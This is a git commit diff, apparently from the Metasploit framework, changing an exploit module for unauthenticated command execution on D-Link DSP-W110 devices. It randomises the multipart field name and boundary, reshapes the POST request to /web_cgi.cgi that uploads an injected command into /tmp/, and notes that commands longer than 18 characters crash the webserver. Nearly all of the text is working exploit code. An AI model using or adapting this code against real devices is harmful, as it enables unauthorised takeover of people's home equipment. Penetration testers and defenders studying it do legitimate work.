feedback included

Michael Messner · Michael Messner · commit d7beb1a68593 · 2015-07-09T08:31:11.000+02:00
diff --git a/modules/exploits/linux/http/dlink_dspw110_cookie_noauth_exec.rb b/modules/exploits/linux/http/dlink_dspw110_cookie_noauth_exec.rb
@@ -112,16 +112,21 @@ def execute_command(cmd,opts)
     file_upload << cmd << "\n"
 
     post_data = Rex::MIME::Message.new
-    post_data.add_part(file_upload, nil, "binary", "form-data; name=\"xxx\"; filename=\"#{@counter}\"")
-    post_data.bound = "-9bcdb049f0d2--"
+    post_data.add_part(file_upload, nil, "binary", "form-data; name=\"#{rand_text_alpha(4)}\"; filename=\"#{@counter}\"")
+    post_data.bound = "-#{rand_text_alpha(12)}--"
     file = post_data.to_s
 
     @counter = @counter + 1
 
     begin
       send_request_cgi({
         'method'        => 'POST',
-        'uri'           => "/web_cgi.cgi?&request=UploadFile&path=/tmp/",
+        'uri'           => "/web_cgi.cgi",
+        'vars_get' => {
+          '&request' =>'UploadFile',
+          'path' => '/tmp/',
+        },
+        'encode_params' => false,
         'ctype'         => "multipart/form-data; boundary=#{post_data.bound}",
         'data'          => file
       })
@@ -132,6 +137,7 @@ def execute_command(cmd,opts)
   end
 
   def execute_final_command(cmd)
+    #very limited space - larger commands crash the webserver
     fail_with(Failure::Unknown, "#{peer} - Generated command for injection is too long") if cmd.length > 18
     begin
       send_request_cgi({
